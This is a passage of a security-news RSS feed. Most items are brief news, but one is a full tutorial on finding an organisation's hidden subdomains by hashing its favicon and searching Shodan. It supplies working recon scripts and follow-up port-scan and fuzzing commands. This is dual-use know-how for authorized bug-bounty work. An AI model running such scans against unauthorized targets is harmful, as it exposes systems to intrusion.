<content:encoded><![CDATA[Backed by former UK deputy prime minister Nick Clegg, Efekta is rolling out AI language lessons to state schools around the world]]></content:encoded>
</item>
<item>
<title><![CDATA[Qemu escape?!]]></title>
<description><![CDATA[https://x.com/v12sec/status/2055282721212252178?s=20 Are we having fun yet?! I don't think most will be affected by this though, requires CXL as far as I can tell. This has got to be the craziest couple of weeks in IT I've ever seen, and the direction of travel doesn't look good, I wasn't expecti...]]></description>
<link>https://tsecurity.de/de/3521077/linux-tipps/qemu-escape/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3521077/linux-tipps/qemu-escape/</guid>
<pubDate>Sat, 16 May 2026 01:09:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p><a href="https://x.com/v12sec/status/2055282721212252178?s=20">https://x.com/v12sec/status/2055282721212252178?s=20</a></p> <p>Are we having fun yet?! I don't think most will be affected by this though, requires CXL as far as I can tell.</p> <p>This has got to be the craziest couple of weeks in IT I've ever seen, and the direction of travel doesn't look good, I wasn't expecting a qemu escape so soon...</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/nick-bmth"> /u/nick-bmth </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1te8pse/qemu_escape/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1te8pse/qemu_escape/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat Stories Episode 3 |  Patrick Ventuzelo, CEO & Founder of FuzzingLabs]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 0x - Views:5 Patrick Ventuzelo, CEO and founder of FuzzingLabs, explains why Black Hat Europe and Black Hat USA are key events for sharing research and connecting with the fuzzing and offensive security community.

#BlackHatStories #BlackHat #cybersecurity #BHEU #BHUSA]]></description>
<link>https://tsecurity.de/de/3517708/it-security-video/black-hat-stories-episode-3-patrick-ventuzelo-ceo-founder-of-fuzzinglabs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3517708/it-security-video/black-hat-stories-episode-3-patrick-ventuzelo-ceo-founder-of-fuzzinglabs/</guid>
<pubDate>Thu, 14 May 2026 21:17:27 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 0x - Views:5 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/8quCoE7I9DI?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Patrick Ventuzelo, CEO and founder of FuzzingLabs, explains why Black Hat Europe and Black Hat USA are key events for sharing research and connecting with the fuzzing and offensive security community.<br />
<br />
#BlackHatStories #BlackHat #cybersecurity #BHEU #BHUSA<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nick Turley im Interview: Was ChatGPT 2027 können soll – und warum Token-Limits bleiben]]></title>
<description><![CDATA[Nick Turley verantwortet als Produktchef bei OpenAI die Weiterentwicklung von ChatGPT. Bereits 2026 war er im Podcast bei t3n zu Gast. Seine damaligen Prognosen hat er jetzt, ein Jahr später im Rahmen der Marketing-Messe OMR, eingeordnet und einen Ausblick auf 2027 gegeben.
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3517541/it-nachrichten/nick-turley-im-interview-was-chatgpt-2027-koennen-soll-und-warum-token-limits-bleiben/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3517541/it-nachrichten/nick-turley-im-interview-was-chatgpt-2027-koennen-soll-und-warum-token-limits-bleiben/</guid>
<pubDate>Thu, 14 May 2026 19:47:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nick Turley verantwortet als Produktchef bei OpenAI die Weiterentwicklung von ChatGPT. Bereits 2026 war er im Podcast bei t3n zu Gast. Seine damaligen Prognosen hat er jetzt, ein Jahr später im Rahmen der Marketing-Messe OMR, eingeordnet und einen Ausblick auf 2027 gegeben.
<a href="https://t3n.de/news/nick-turley-im-interview-chatgpt-1741701/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple renews ‘Margo’s Got Money Troubles’ for season 2 before finale airs]]></title>
<description><![CDATA[Apple has officially renewed “Margo’s Got Money Troubles” for season 2 after the show delivered a strong debut on Apple’s streaming platform. The renewal comes just days before the first season finale, showing Apple’s confidence in the comedy-drama series and its growing popularity with viewers.
...]]></description>
<link>https://tsecurity.de/de/3517502/ios-mac-os/apple-renews-margos-got-money-troubles-for-season-2-before-finale-airs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3517502/ios-mac-os/apple-renews-margos-got-money-troubles-for-season-2-before-finale-airs/</guid>
<pubDate>Thu, 14 May 2026 19:24:19 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has officially renewed “Margo’s Got Money Troubles” for season 2 after the show delivered a strong debut on Apple’s streaming platform. The renewal comes just days before the first season finale, showing Apple’s confidence in the comedy-drama series and its growing popularity with viewers.



The series premiered last month and quickly gained attention for its performances, writing, and emotional storytelling. Apple also noted that the show earned a Certified Fresh rating on Rotten Tomatoes shortly after release, while critics praised the balance between comedy, family struggles, and financial pressure.



Cast earns early award recognition



The show already picked up major award nominations ahead of its finale. Elle Fanning received a nomination for Outstanding Lead Performance in a Comedy Series at the 2026 Gotham Television Awards, while Michelle Pfeiffer earned a nomination for Outstanding Supporting Performance in a Comedy Series.



The cast also includes Nicole Kidman, Nick Offerman, and Greg Kinnear, which helped the series attract attention even before its premiere.



According to Apple TV, the story follows Margo, a college dropout and aspiring writer who struggles to support herself and her newborn baby while dealing with rising bills and limited opportunities. The series blends personal drama with dark comedy while focusing on modern financial pressure and complicated family relationships.



Apple has not announced a release date for season 2 yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Find Subdomains Using Shodan and the Favicon Hash Trick]]></title>
<description><![CDATA[Find Subdomains Using Shodan and the Favicon Hash TrickSubdomain enumeration is the foundation of any serious bug bounty reconnaissance. While tools like Sublist3r, Amass, and crt.sh are excellent, they rely on DNS records and certificate transparency logs — which means they only find what’s publ...]]></description>
<link>https://tsecurity.de/de/3516567/hacking/how-to-find-subdomains-using-shodan-and-the-favicon-hash-trick/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3516567/hacking/how-to-find-subdomains-using-shodan-and-the-favicon-hash-trick/</guid>
<pubDate>Thu, 14 May 2026 13:39:57 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2ieufrbPy2NTKyTxI9mr6w.png"><figcaption>Find Subdomains Using Shodan and the Favicon Hash Trick</figcaption></figure><p>Subdomain enumeration is the foundation of any serious bug bounty reconnaissance. While tools like Sublist3r, Amass, and crt.sh are excellent, they rely on DNS records and certificate transparency logs — which means they only find what’s <em>publicly indexed</em>.</p><p>There’s a smarter way.</p><p>Many organizations reuse the same favicon across their entire infrastructure — main site, subdomains, staging servers, CDN nodes, and even internal tools. This means the favicon acts as a unique fingerprint. If you can hash it and search Shodan’s indexed data, you can discover subdomains and servers that no DNS brute-force tool will ever find.</p><p>This guide walks you through the entire process on Kali Linux, from calculating the favicon hash to extracting live, validated subdomains.</p><h3>How It Works</h3><pre>Target Domain (example.com)<br>        │<br>        ▼<br>Download Favicon → Compute MurmurHash3 → Search Shodan<br>        │<br>        ▼<br>Shodan returns all IPs/hostnames sharing that favicon hash<br>        │<br>        ▼<br>Extract hostnames → DNS resolution → HTTP validation<br>        │<br>        ▼<br>Live Subdomains Discovered</pre><p>The key insight: Shodan indexes favicon hashes for every website it scans. The search filter http.favicon.hash:&lt;hash&gt; lets you query all servers worldwide that share the exact same favicon as your target.</p><h3>Prerequisites</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/737/1*95naH1RwUAju0rQMK3s29w.png"><figcaption>Prerequisites</figcaption></figure><h3>Install Required Tools</h3><pre># Install dnsx and httpx (ProjectDiscovery tools)<br>go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest<br>go install github.com/projectdiscovery/httpx/cmd/httpx@latest<br>sudo cp ~/go/bin/dnsx /usr/bin/<br>sudo cp ~/go/bin/httpx /usr/bin/</pre><h3>Step 1: Install Shodan CLI</h3><h4>Install via pip</h4><pre>pip3 install shodan</pre><h4>Verify Installation</h4><pre>shodan --help</pre><h4>Initialize with Your API Key</h4><p>You need a Shodan API key. Get yours at: <a href="https://account.shodan.io/">https://account.shodan.io</a></p><pre>shodan init YOUR_SHODAN_API_KEY</pre><p>Replace YOUR_SHODAN_API_KEY with your actual key.</p><h4>Test Your Connection</h4><pre>shodan info</pre><p>Expected output:</p><pre>Query credits available: 100<br>Scan credits available: 0</pre><h3>Step 2: Extract the Favicon &amp; Calculate Its Hash</h3><h3>Method A: Favicon at Standard Location</h3><p>Most sites host their favicon at /favicon.ico. Download it with:</p><pre>curl -s https://example.com/favicon.ico -o favicon.ico</pre><h3>Method B: Favicon at Custom Location</h3><p>If the standard location doesn’t work, inspect the HTML source:</p><pre>curl -s https://example.com | grep -i "favicon\|icon" | grep -oP 'href="\K[^"]+'</pre><p>Then download from the discovered path:</p><pre>curl -s https://example.com/path/to/favicon.ico -o favicon.ico</pre><h3>Calculate the Favicon Hash</h3><p>Create a Python script called favicon_hash.py:</p><pre>#!/usr/bin/env python3<br>"""<br>Favicon Hash Calculator for Shodan Reconnaissance<br>Usage: python3 favicon_hash.py &lt;favicon_url&gt;<br>"""<br>import mmh3<br>import requests<br>import sys<br>import codecs<br>def calculate_favicon_hash(url):<br>    """Download favicon and calculate MurmurHash3 hash."""<br>    try:<br>        response = requests.get(url, timeout=10, verify=False)<br>        response.raise_for_status()<br>        <br>        favicon = response.content<br>        hash_value = mmh3.hash(favicon)<br>        <br>        print(f"[+] URL: {url}")<br>        print(f"[+] Favicon Hash: {hash_value}")<br>        print(f"[+] Use in Shodan: http.favicon.hash:{hash_value}")<br>        <br>        return hash_value<br>        <br>    except requests.exceptions.RequestException as e:<br>        print(f"[-] Error downloading favicon: {e}")<br>        sys.exit(1)<br>    except Exception as e:<br>        print(f"[-] Error calculating hash: {e}")<br>        sys.exit(1)<br>if __name__ == "__main__":<br>    if len(sys.argv) != 2:<br>        print("Usage: python3 favicon_hash.py &lt;favicon_url&gt;")<br>        print("Example: python3 favicon_hash.py https://example.com/favicon.ico")<br>        sys.exit(1)<br>    <br>    # Suppress SSL warnings for self-signed certs<br>    import urllib3<br>    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br>    <br>    calculate_favicon_hash(sys.argv[1])</pre><p>Make it executable:</p><pre>chmod +x favicon_hash.py</pre><p>Install the required library:</p><pre>pip3 install mmh3 requests</pre><h3>Run the Script</h3><pre>python3 favicon_hash.py https://example.com/favicon.ico</pre><p>Example Output:</p><pre>[+] URL: https://example.com/favicon.ico<br>[+] Favicon Hash: 123456789<br>[+] Use in Shodan: http.favicon.hash:123456789</pre><h3>One-Liner Alternative (No Script File)</h3><p>If you prefer not to create a file, use this one-liner:</p><pre>python3 -c "import mmh3, requests; print(f'Favicon Hash: {mmh3.hash(requests.get(\"https://example.com/favicon.ico\").content)}')"</pre><h3>Step 3: Search Shodan for Matching Favicon Hash</h3><p>Now the real magic begins. Use the hash to find every server Shodan has indexed that shares the same favicon.</p><h3>Basic Search</h3><pre>shodan search --fields ip_str,port,hostnames "http.favicon.hash:123456789" &gt; shodan_results.txt</pre><h3>With Additional Filters</h3><p>Refine your search to focus on specific ports or countries:</p><pre># HTTPS only<br>shodan search --fields ip_str,port,hostnames "http.favicon.hash:123456789 port:443" &gt; shodan_https.txt<br><br># Specific country (e.g., United States)<br>shodan search --fields ip_str,port,hostnames "http.favicon.hash:123456789 country:US" &gt; shodan_us.txt<br><br># Specific organization<br>shodan search --fields ip_str,port,hostnames "http.favicon.hash:123456789 org:\"Target Inc\"" &gt; shodan_org.txt</pre><h3>Download Large Result Sets</h3><p>For targets with many results, use Shodan’s download feature:</p><pre>shodan download --limit 5000 search_results "http.favicon.hash:123456789"<br>shodan parse --fields ip_str,port,hostnames search_results.json.gz &gt; shodan_results.txt</pre><h3>Step 4: Parse and Extract Subdomains</h3><h3>View Raw Results</h3><pre>cat shodan_results.txt</pre><p>Example Output:</p><pre>93.184.216.34    80    www.example.com<br>93.184.216.35    443   sub1.example.com<br>93.184.216.36    80    sub2.example.com<br>192.168.1.10     8080  staging.example.com<br>10.0.0.5         443   admin.internal.example.com</pre><h3>Extract Hostnames Only</h3><pre>awk '{print $3}' shodan_results.txt | sort -u &gt; subdomains.txt</pre><h3>View Extracted Subdomains</h3><pre>cat subdomains.txt</pre><p>Expected Output:</p><pre>www.example.com<br>sub1.example.com<br>sub2.example.com<br>staging.example.com<br>admin.internal.example.com</pre><h3>Alternative: Extract Hostnames with IPs</h3><p>For later reference, keep the IP-to-hostname mapping:</p><pre>awk '{print $1 "\t" $3}' shodan_results.txt | sort -u &gt; ip_hostname_map.txt</pre><h3>Step 5: Validate and Filter Live Subdomains</h3><p>Not all extracted hostnames will resolve. We need to validate them.</p><h3>DNS Resolution with dnsx</h3><pre>cat subdomains.txt | dnsx -silent -o resolved_subdomains.txt</pre><h3>Check for Live HTTP/HTTPS with httpx</h3><pre>cat resolved_subdomains.txt | httpx -silent -o live_subdomains.txt</pre><h3>Full Validation Pipeline (One Command)</h3><p>bash</p><pre>cat subdomains.txt | dnsx -silent | httpx -silent -o live_subdomains.txt</pre><h3>View Live Subdomains</h3><p>bash</p><pre>cat live_subdomains.txt</pre><p>Expected Output:</p><pre>https://www.example.com<br>https://sub1.example.com<br>https://sub2.example.com<br>https://staging.example.com</pre><h3>Enrich with Status Codes and Titles</h3><pre>cat resolved_subdomains.txt | httpx -silent -status-code -title -o enriched.txt<br>cat enriched.txt</pre><p>Example Output:</p><pre>https://www.example.com [200] [Example Domain]<br>https://sub1.example.com [200] [Dashboard - Login]<br>https://staging.example.com [302] [Redirecting...]<br>https://admin.internal.example.com [403] [Forbidden]</pre><h3>Complete One-Click Automation Script</h3><p>Create favicon_subdomain_scanner.sh:</p><pre>#!/bin/bash<br><br># Favicon-Based Subdomain Discovery Tool<br># Author: SecurityTalent<br># Usage: ./favicon_subdomain_scanner.sh &lt;domain&gt;<br>set -e<br>GREEN='\033[0;32m'<br>RED='\033[0;31m'<br>YELLOW='\033[1;33m'<br>NC='\033[0m' # No Color<br>if [ $# -lt 1 ]; then<br>    echo -e "${RED}Usage: $0 &lt;domain&gt; [favicon_url]${NC}"<br>    echo -e "${YELLOW}Example: $0 example.com${NC}"<br>    echo -e "${YELLOW}Example: $0 example.com https://example.com/custom/favicon.ico${NC}"<br>    exit 1<br>fi<br>DOMAIN=$1<br>FAVICON_URL=${2:-"https://$DOMAIN/favicon.ico"}<br>OUTPUT_DIR="favicon_recon_$DOMAIN"<br>TIMESTAMP=$(date +%Y%m%d_%H%M%S)<br>echo -e "${GREEN}[+] Target Domain: $DOMAIN${NC}"<br>echo -e "${GREEN}[+] Favicon URL: $FAVICON_URL${NC}"<br>echo -e "${GREEN}[+] Output Directory: $OUTPUT_DIR${NC}"<br>echo ""<br>mkdir -p "$OUTPUT_DIR"<br># Step 1: Download favicon and calculate hash<br>echo -e "${YELLOW}[*] Step 1: Downloading favicon and calculating hash...${NC}"<br>curl -s "$FAVICON_URL" -o "$OUTPUT_DIR/favicon.ico"<br>if [ ! -f "$OUTPUT_DIR/favicon.ico" ] || [ ! -s "$OUTPUT_DIR/favicon.ico" ]; then<br>    echo -e "${RED}[-] Failed to download favicon. Trying alternative discovery...${NC}"<br>    # Try to find favicon from HTML<br>    FAV_ALT=$(curl -s "https://$DOMAIN" | grep -oP 'href="\K[^"]*favicon[^"]*' | head -1)<br>    if [ -n "$FAV_ALT" ]; then<br>        if [[ "$FAV_ALT" == http* ]]; then<br>            FAVICON_URL="$FAV_ALT"<br>        else<br>            FAVICON_URL="https://$DOMAIN$FAV_ALT"<br>        fi<br>        echo -e "${GREEN}[+] Discovered alternative favicon URL: $FAVICON_URL${NC}"<br>        curl -s "$FAVICON_URL" -o "$OUTPUT_DIR/favicon.ico"<br>    else<br>        echo -e "${RED}[-] Could not find favicon. Exiting.${NC}"<br>        exit 1<br>    fi<br>fi<br>HASH=$(python3 -c "import mmh3; print(mmh3.hash(open('$OUTPUT_DIR/favicon.ico','rb').read()))")<br>echo -e "${GREEN}[+] Favicon Hash: $HASH${NC}"<br>echo "$HASH" &gt; "$OUTPUT_DIR/favicon_hash.txt"<br># Step 2: Search Shodan<br>echo -e "${YELLOW}[*] Step 2: Searching Shodan for matching favicon hash...${NC}"<br>shodan search --fields ip_str,port,hostnames "http.favicon.hash:$HASH" &gt; "$OUTPUT_DIR/shodan_raw.txt"<br>echo -e "${GREEN}[+] Shodan results saved to $OUTPUT_DIR/shodan_raw.txt${NC}"<br># Step 3: Extract hostnames<br>echo -e "${YELLOW}[*] Step 3: Extracting hostnames...${NC}"<br>awk '{print $3}' "$OUTPUT_DIR/shodan_raw.txt" | grep -v "^$" | sort -u &gt; "$OUTPUT_DIR/subdomains_raw.txt"<br>echo -e "${GREEN}[+] $(wc -l &lt; "$OUTPUT_DIR/subdomains_raw.txt") unique hostnames found${NC}"<br># Step 4: DNS Resolution<br>echo -e "${YELLOW}[*] Step 4: Resolving DNS...${NC}"<br>cat "$OUTPUT_DIR/subdomains_raw.txt" | dnsx -silent -o "$OUTPUT_DIR/resolved.txt" 2&gt;/dev/null || \<br>    cat "$OUTPUT_DIR/subdomains_raw.txt" &gt; "$OUTPUT_DIR/resolved.txt"<br>echo -e "${GREEN}[+] $(wc -l &lt; "$OUTPUT_DIR/resolved.txt") resolved hostnames${NC}"<br># Step 5: HTTP Validation<br>echo -e "${YELLOW}[*] Step 5: Checking live HTTP hosts...${NC}"<br>cat "$OUTPUT_DIR/resolved.txt" | httpx -silent -status-code -title -o "$OUTPUT_DIR/live_enriched.txt" 2&gt;/dev/null || \<br>    cat "$OUTPUT_DIR/resolved.txt" &gt; "$OUTPUT_DIR/live_enriched.txt"<br># Extract just URLs<br>awk '{print $1}' "$OUTPUT_DIR/live_enriched.txt" &gt; "$OUTPUT_DIR/live_subdomains.txt"<br>echo ""<br>echo -e "${GREEN}========================================${NC}"<br>echo -e "${GREEN}  RECONNAISSANCE COMPLETE${NC}"<br>echo -e "${GREEN}========================================${NC}"<br>echo -e "${GREEN}[+] Target: $DOMAIN${NC}"<br>echo -e "${GREEN}[+] Favicon Hash: $HASH${NC}"<br>echo -e "${GREEN}[+] Total Subdomains Found: $(wc -l &lt; "$OUTPUT_DIR/subdomains_raw.txt")${NC}"<br>echo -e "${GREEN}[+] Live Subdomains: $(wc -l &lt; "$OUTPUT_DIR/live_subdomains.txt")${NC}"<br>echo ""<br>echo -e "${YELLOW}Results saved to: $OUTPUT_DIR/${NC}"<br>echo -e "${YELLOW}  - favicon_hash.txt${NC}"<br>echo -e "${YELLOW}  - shodan_raw.txt${NC}"<br>echo -e "${YELLOW}  - subdomains_raw.txt${NC}"<br>echo -e "${YELLOW}  - resolved.txt${NC}"<br>echo -e "${YELLOW}  - live_subdomains.txt${NC}"<br>echo -e "${YELLOW}  - live_enriched.txt${NC}"<br>echo ""<br>echo -e "${GREEN}Live Subdomains:${NC}"<br>cat "$OUTPUT_DIR/live_subdomains.txt"</pre><p>Make it executable and run:</p><pre>chmod +x favicon_subdomain_scanner.sh<br><br># Basic usage<br>./favicon_subdomain_scanner.sh example.com<br># With custom favicon URL<br>./favicon_subdomain_scanner.sh example.com https://example.com/assets/custom-icon.ico<br></pre><h3>Tips for Bug Bounty Hunters</h3><h3>1. Cross-Check Technologies</h3><p>Use WhatWeb or Wappalyzer to verify if discovered subdomains share the same tech stack:</p><pre>whatweb -l subdomains_raw.txt</pre><h3>2. Expand the Attack Surface</h3><p>Once you have live subdomains, test for:</p><pre># Directory fuzzing<br>ffuf -u https://subdomain.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt<br><br># Open ports<br>nmap -sC -sV -p- subdomain.com<br># .git exposure<br>gau subdomain.com | grep "\.git"<br># CORS misconfigurations<br>corsy -u https://subdomain.com</pre><h3>3. Known Favicon Hashes for Quick Wins</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/731/1*i6zLXLKC_Y4q7QgVeQh47A.png"><figcaption>Known Favicon Hashes for Quick Wins</figcaption></figure><pre># Quick search for all WordPress sites (hash: 116323821)<br>shodan search --fields ip_str,port,hostnames "http.favicon.hash:116323821"</pre><h3>4. Automate with Shodan API</h3><p>For large-scale searches with full result sets:</p><pre># Download up to 10,000 results<br>shodan download --limit 10000 search_results "http.favicon.hash:123456789"<br><br># Parse the compressed results<br>shodan parse --fields ip_str,port,hostnames search_results.json.gz &gt; full_results.txt</pre><h3>5. Combine with Other Tools</h3><pre># Merge with traditional subdomain enumeration<br>subfinder -d example.com -o subfinder_domains.txt<br>cat subfinder_domains.txt subdomains_raw.txt | sort -u &gt; all_subdomains.txt<br><br># Check with crt.sh<br>curl -s "https://crt.sh/?q=%25.example.com&amp;output=json" | jq -r '.[].name_value' | sort -u &gt;&gt; all_subdomains.txt<br># Validate all combined<br>cat all_subdomains.txt | httpx -silent -o final_live.txt</pre><h3>6. Common Favicon Locations to Check</h3><pre># Standard locations many targets use<br>for path in /favicon.ico /favicon.png /assets/favicon.ico /static/favicon.ico /images/favicon.ico /img/favicon.ico; do<br>    echo "Checking: https://example.com$path"<br>    curl -s -o /dev/null -w "%{http_code}" "https://example.com$path"<br>    echo ""<br>done</pre><h3>7. Handle Redirects</h3><p>Some favicons are served via redirect. Follow them:</p><pre>curl -sL https://example.com/favicon.ico -o favicon.ico</pre><h3>Why This Works</h3><h4>Technical Explanation</h4><p>The favicon hash technique works because of three key factors:</p><ol><li>Favicon Reuse — Organizations consistently reuse their favicon across all subdomains, staging environments, CDN endpoints, and even internal applications. It’s a branding artifact that gets copied everywhere.</li><li>Shodan Indexing — Shodan continuously scans the internet and indexes http.favicon.hash as a searchable field for every HTTP response that contains a favicon.</li><li>MurmurHash3 Consistency — The hash algorithm produces the same output for the same binary input. Any server serving the exact same favicon file will produce the identical hash, regardless of the domain name or IP address.</li></ol><h3>What You Can Discover That Other Tools Miss</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/699/1*K_0saG51eNA6cSWY31nO6A.png"><figcaption>Discover Other Tools</figcaption></figure><h3>Troubleshooting</h3><h3>Issue 1: Shodan Returns No Results</h3><pre># Check if you have credits<br>shodan info<br><br># Test with a known hash (Google's favicon)<br>shodan search --fields ip_str,port,hostnames "http.favicon.hash:-305179312"</pre><h3>Issue 2: Favicon Download Fails</h3><pre># Test with verbose curl<br>curl -v https://example.com/favicon.ico<br><br># Try without SSL verification<br>curl -sk https://example.com/favicon.ico -o favicon.ico</pre><h3>Issue 3: “mmh3” Module Not Found</h3><pre>pip3 install mmh3<br># If that fails, try:<br>pip3 install mmh3cffi</pre><h3>Issue 4: “shodan: command not found”</h3><pre># Find where pip installed it<br>python3 -m shodan --help<br><br># Add to PATH<br>export PATH=$PATH:~/.local/bin<br>echo 'export PATH=$PATH:~/.local/bin' &gt;&gt; ~/.bashrc</pre><h3>Issue 5: HTTPX/DNSX Not Found</h3><pre># Install from Go<br>go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest<br>go install github.com/projectdiscovery/httpx/cmd/httpx@latest<br><br># Copy to PATH<br>sudo cp ~/go/bin/dnsx /usr/local/bin/<br>sudo cp ~/go/bin/httpx /usr/local/bin/</pre><h3>Ethical &amp; Legal Reminder</h3><blockquote>IMPORTANT: This technique discovers servers and subdomains that may include staging, internal, or development environments. Only test targets you are explicitly authorized to assess.</blockquote><ul><li>Bug Bounty: Verify scope before testing any discovered subdomain</li><li>Pentesting: Include all discovered assets in your Rules of Engagement</li><li>Disclosure: Report discovered internal/development servers responsibly</li></ul><h3>Conclusion</h3><p>The favicon hash trick is one of the most underutilized techniques in bug bounty reconnaissance. While everyone else is brute-forcing DNS records and scraping certificate logs, you can leverage Shodan’s massive indexed dataset to find hidden assets based on a single shared favicon.</p><h3>Key Takeaways</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/742/1*YXxJWiTuKZJf-eb8ZQWNOA.png"><figcaption>Key Takeaways</figcaption></figure><h3>Quick Reference (One-Click)</h3><pre># Complete workflow in 3 commands<br>HASH=$(python3 -c "import mmh3, requests; print(mmh3.hash(requests.get('https://example.com/favicon.ico').content))")<br>shodan search --fields ip_str,port,hostnames "http.favicon.hash:$HASH" | awk '{print $3}' | sort -u | dnsx -silent | httpx -silent -status-code -title</pre><h3>What’s Next?</h3><p>Once you have your live subdomains, consider:</p><ul><li>Port scanning with naabu or nmap</li><li>Directory fuzzing with ffuf or gobuster</li><li>Technology fingerprinting with wappalyzer or whatweb</li><li>JavaScript analysis with subjs or jsluice</li><li>Endpoint discovery with gau or katana</li></ul><h3>Complete Setup Script</h3><p>Save as setup_favicon_recon.sh:</p><pre>#!/bin/bash<br><br>echo "[+] Installing required Python packages..."<br>pip3 install shodan mmh3 requests --quiet<br>echo "[+] Installing Go tools..."<br>go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest<br>go install github.com/projectdiscovery/httpx/cmd/httpx@latest<br>sudo cp ~/go/bin/dnsx /usr/bin/<br>sudo cp ~/go/bin/httpx /usr/bin/<br>echo "[+] Creating favicon_hash.py..."<br>cat &gt; favicon_hash.py &lt;&lt; 'PYEOF'<br>#!/usr/bin/env python3<br>import mmh3, requests, sys, urllib3<br>urllib3.disable_warnings()<br>if len(sys.argv) != 2:<br>    print("Usage: python3 favicon_hash.py &lt;url&gt;")<br>    sys.exit(1)<br>r = requests.get(sys.argv[1], timeout=10, verify=False)<br>print(f"Favicon Hash: {mmh3.hash(r.content)}")<br>PYEOF<br>chmod +x favicon_hash.py<br>echo ""<br>echo "[+] Setup Complete!"<br>echo ""<br>echo "[+] Test with: python3 favicon_hash.py https://example.com/favicon.ico"<br>echo "[+] Then: shodan search --fields ip_str,port,hostnames \"http.favicon.hash:&lt;HASH&gt;\""</pre><p>Happy Bug Hunting!</p><p><em>Found this useful? Follow </em><a href="https://github.com/SecurityTalent/"><strong><em>SecurityTalent</em></strong><em> </em></a><em>for more advanced recon techniques, vulnerability research, and bug bounty strategies.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=ac01741b0fb5" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/how-to-find-subdomains-using-shodan-and-the-favicon-hash-trick-ac01741b0fb5">How to Find Subdomains Using Shodan and the Favicon Hash Trick</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dr. Rick & Dr. Nick: Ärzte verlieren wegen KI-Halluzinationen vor Gericht]]></title>
<description><![CDATA[Das Oberlandesgericht Hamm hat Anbietern für Schönheitsbehandlungen für Falschangaben ihres Chatbots verantwortlich erklärt.]]></description>
<link>https://tsecurity.de/de/3514583/it-nachrichten/dr-rick-dr-nick-aerzte-verlieren-wegen-ki-halluzinationen-vor-gericht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3514583/it-nachrichten/dr-rick-dr-nick-aerzte-verlieren-wegen-ki-halluzinationen-vor-gericht/</guid>
<pubDate>Wed, 13 May 2026 19:17:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Oberlandesgericht Hamm hat Anbietern für Schönheitsbehandlungen für Falschangaben ihres Chatbots verantwortlich erklärt.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft’s new AI system finds 16 Windows flaws, including four critical RCEs]]></title>
<description><![CDATA[Microsoft has unveiled a new AI-driven vulnerability discovery system that identified 16 previously unknown Windows vulnerabilities, including four critical remote code execution flaws, in what security analysts say could mark a major shift in how software vulnerabilities are discovered and remed...]]></description>
<link>https://tsecurity.de/de/3513678/it-security-nachrichten/microsofts-new-ai-system-finds-16-windows-flaws-including-four-critical-rces/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3513678/it-security-nachrichten/microsofts-new-ai-system-finds-16-windows-flaws-including-four-critical-rces/</guid>
<pubDate>Wed, 13 May 2026 14:37:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft has unveiled a new AI-driven vulnerability discovery system that identified 16 previously unknown Windows vulnerabilities, including four critical remote code execution flaws, in what security analysts say could mark a major shift in how software vulnerabilities are discovered and remediated.</p>



<p>The system, codenamed MDASH, was developed by Microsoft’s Autonomous Code Security team alongside the Windows Attack Research and Protection group.</p>



<p>The platform will enter private preview for enterprise customers next month, Microsoft said in a blog <a href="https://www.microsoft.com/en-us/security/blog/2026/05/12/defense-at-ai-speed-microsofts-new-multi-model-agentic-security-system-tops-leading-industry-benchmark/" target="_blank" rel="noreferrer noopener">post</a> announcing the system.</p>



<p>The vulnerabilities were patched as part of Microsoft’s May 12 Patch Tuesday release.</p>



